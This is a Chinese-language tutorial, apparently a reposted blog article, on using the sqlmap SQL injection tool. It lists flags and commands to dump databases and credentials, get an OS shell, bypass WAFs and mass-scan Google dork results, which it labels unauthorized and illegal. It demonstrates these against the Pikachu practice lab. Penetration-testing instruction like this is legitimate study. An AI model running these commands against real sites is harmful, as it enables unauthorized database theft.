?
常用命令:
-u指定目標(biāo)URL (可以是http協(xié)議也可以是https協(xié)議)
-d連接數(shù)據(jù)庫
--dbs列出所有的數(shù)據(jù)庫
--current-db列出當(dāng)前數(shù)據(jù)庫
--tables列出當(dāng)前的表
--columns列出當(dāng)前的列
-D選擇使用哪個數(shù)據(jù)庫
-T選擇使用哪個表
-C選擇使用哪個列
--dump獲取字段中的數(shù)據(jù)
--dump-all?拖庫
--batch?自動選擇yes
--smart?啟發(fā)式快速判斷,節(jié)約浪費(fèi)時間
--forms?嘗試使用post注入
-r?加載文件中的HTTP請求(本地保存的請求包txt文件)
-l?加載文件中的HTTP請求(本地保存的請求包日志文件)
-g?自動獲取Google搜索的前一百個結(jié)果,對有GET參數(shù)的URL測試
-o?開啟所有默認(rèn)性能優(yōu)化
-f fingerprint 獲取指紋信息
--tamper??調(diào)用腳本進(jìn)行注入
-v?指定sqlmap的回顯等級
--delay?設(shè)置多久訪問一次
--os-shell??獲取主機(jī)shell,一般不太好用,因為沒權(quán)限
-m?批量操作
-c?指定配置文件,會按照該配置文件執(zhí)行動作
-data???data指定的數(shù)據(jù)會當(dāng)做post數(shù)據(jù)提交
-timeout??設(shè)定超時時間
-level
設(shè)置注入探測等級共有五個等級,默認(rèn)為1級, 這個參數(shù)不僅影響使用哪些payload同時也會影響測試的注入點,GET和POST的數(shù)據(jù)都會測試,HTTP Cookie在level為2的時候就會測試,HTTP User-Agent/Referer頭在level為3的時候就會測試。總之在你不確定哪個payload或者參數(shù)為注入點的時候,為了保證全面性,建議使用高的level值。
--is-dba?判斷當(dāng)前用戶是否為數(shù)據(jù)庫管理員權(quán)限
--risk?風(fēng)險等級
--identify-waf?檢測防火墻類型
--param-del="分割符"??設(shè)置參數(shù)的分割符
--skip-urlencode不進(jìn)行url編碼
--keep-alive設(shè)置持久連接,加快探測速度
--null-connection檢索沒有body響應(yīng)的內(nèi)容,多用于盲注
--thread最大為10 設(shè)置多線程
--delay
有些web服務(wù)器請求訪問太過頻繁可能會被防火墻攔截,使用--delay就可以設(shè)定兩次http請求的延時
--safe-url?有的web服務(wù)器會在多次錯誤的訪問請求后屏蔽所有請求,使用--safe-url 就可以每隔一段時間去訪問一個正常的頁面。
--technique?指定注入類型
B:Boolean-based-blind (布爾型型注入)
E:Error-based (報錯型注入)
U:Union query-based (聯(lián)合注入)
S:Starked queries (通過sqlmap讀取文件系統(tǒng)、操作系統(tǒng)、注冊表必須 使用該參數(shù),可多語句查詢注入)
T:Time-based blind (基于時間延遲注入)
--dump --smart --batch???自動得到所有信息
SQLmap直連數(shù)據(jù)庫
服務(wù)型數(shù)據(jù)庫(提前知道數(shù)據(jù)庫用戶名和密碼):
Eg:python sqlmap.py -d”?mysql://admin:admin@192.18.255.1:3306/testdb”?-f --banner --dbs --users
文件型數(shù)據(jù)庫(提前知道數(shù)據(jù)庫的絕對路徑)
Sqlmap url探測
實例暴力破解
Pikachu ?post 型
數(shù)字型注入
抓個包,在sqlmap中查詢所有數(shù)據(jù)庫 --dbs
得到結(jié)果如圖所示
獲取數(shù)據(jù)庫名稱和數(shù)據(jù)庫版本 --current -db
?
?
獲得pikchu數(shù)據(jù)庫中的表單 ?-D pikachu --tables
獲取user表中的全部列 -D pikachu -T users -columns
獲取其中的賬號密碼 -D pikachu -T users -C username,password --dump
Pikachu2:get型
Python sqlmap.py -u "http://127.0.0.1:8080/pikachu/vul/sqli/sqli_str.php?name=hello&submit=%E6%9F%A5%E8%AF%A2" (--current-db)?--smart --batch
Sqlmap文件讀取目標(biāo)
-r?加載文件中的HTTP請求(本地保存的請求包txt文件)
-l?加載文件中的HTTP請求(本地保存的請求包日志文件)
-x 從sitemap.xml站點地圖中讀取目標(biāo)探測
-m 從文本文件中讀取HTTP請求作為sql注入探測的目標(biāo)
-c 從配置文件sqlmap.conf中讀取目標(biāo)探測
抓包,test文檔里有信息,將test粘貼到salmap中
Sqlmap Google批量掃注入(未授權(quán)違法)
-G:自動利用Google獲取指定Google hack 的目標(biāo),然后利用交互向?qū)J竭M(jìn)行SQL注入探測
Eg:python sqlmap.py -g “inurl:.php?id=1”
三、Sqlmap請求參數(shù)設(shè)置
1、sqlmap設(shè)置HTTP方法
Sqlmap會自動在探測過程中使用適合的HTTP請求方法。但有時候SQLmap不能切換到對應(yīng)的HTTP方法,而導(dǎo)致探測失敗,需要強(qiáng)制的使用具體的HTTP請求方法。
例如put請求方法。HTTP put請求方法不會自動使用,因此我們需要強(qiáng)制指定。使用--method=PUT
2、sqlmap設(shè)置post提交參數(shù)
默認(rèn)情況,執(zhí)行http請求的HTTP方法是GET,但是可以通過加上--data=””改為post,或者使用--method=po's't
Post提交
-u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2"
需要寫--data里面
Get提交
-u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince&submit=%E6%9F%A5%E8%AF%A2"?
在url里面
Eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1" -f --banner --dbs --users
-f fingerprint 指紋
3、sqlmap設(shè)置參數(shù)分隔符
某些情況下,sqlmap需要覆蓋默認(rèn)參數(shù)分隔符(例如& in GET和POST數(shù)據(jù)),才能正確地分割和單獨(dú)處理每個參數(shù)。
python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";" -f --banner --dbs -- users
參數(shù)拆分字符 ??--param-del ??當(dāng)get或post的數(shù)據(jù)需要用其他字符分割測試參數(shù)的時候需要用到此參數(shù)
4、sqlmap設(shè)置cookie頭
--cookie
--cookie-del
--load-cookies
--drop-set-cookie
使用場景:
1、web應(yīng)用需要登陸的時候。
2、你想要在這些頭參數(shù)中測試SQL注入時。
Sqlmap使用cookie過程:
- 登錄或瀏覽也頁面
- 打開審計工具或者代理截斷,復(fù)制cookie
- 在sqlmap中使用 --cookie 粘貼cookie
cookie其實就是身份識別
此處不加cookie的話可能會進(jìn)行跳轉(zhuǎn)出現(xiàn)302錯誤
因為你使用的是賬號密碼登錄,獲取登陸的cookie
不加cookie直接登錄的話就相當(dāng)于你沒有輸入賬號和密碼
當(dāng)然跳轉(zhuǎn)到另一個頁面了
就不會到登錄成功的頁面文章來源:http://www.zghlxwxcb.cn/news/detail-759024.html
但是會出現(xiàn)一種情況
cookie值不是固定的
也就是你一開始使用cookie注入后
服務(wù)器返回給你一個cookie,這個返回的cookie不同于你一開始設(shè)置的cookie
返回的這個cookie是登陸成功后的cookie
所以我們之前的cookie注入就不能針對成功后的注入
我們現(xiàn)在對成功后的cookie進(jìn)行測試
burp獲取成功后的cookie可能需要點forward文章來源地址http://www.zghlxwxcb.cn/news/detail-759024.html
到了這里,關(guān)于滲透工具-sqlmap-基本知識及使用教程的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!